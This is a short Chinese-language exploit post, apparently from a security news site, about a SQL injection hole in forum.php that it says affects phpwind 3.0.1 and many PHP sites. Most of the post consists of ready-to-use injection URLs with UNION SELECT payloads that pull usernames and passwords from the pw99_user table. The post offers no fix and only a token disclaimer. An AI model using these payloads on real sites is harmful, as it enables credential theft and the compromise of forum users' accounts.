类: 输出确认错误
CVE: CVE-MAP-NOMATCH
forum.php注入漏洞
forum.php很多php网站都有这个页面。包括现在流行的phpwind3.0.1,破坏性很大。
希望合理利用,本站仅供技术研究,一切漏洞带来的责任无本站无关。
by rose
利用方式如下:
--------------------
//-------1---------//
http://WWW.xxxx.COM/xxxx/forum.php?modul=topics&channel=[SQL]
http://WWW.xxxx.COM/xxxx/forum.php?modul=topics&channel=-99%20UNION%20SELECT%20null,password%20FROM%20pw99_user%20WHERE%20id=1
//-------2--------//
http://WWW.xxxxx.COM/xxxx/forum.php?modul=posting&topic=[SQL]&channel=3
http://oWWW.xxxx.COM/xxxx/forum.php?modul=posting&topic=30%20UNION%20SELECT%20null,username,null,password%20FROM%20pw99_user%20WHERE%20id=1/*&channel=3 | |
安全中国首页 > 新闻中心 > 网站程序漏洞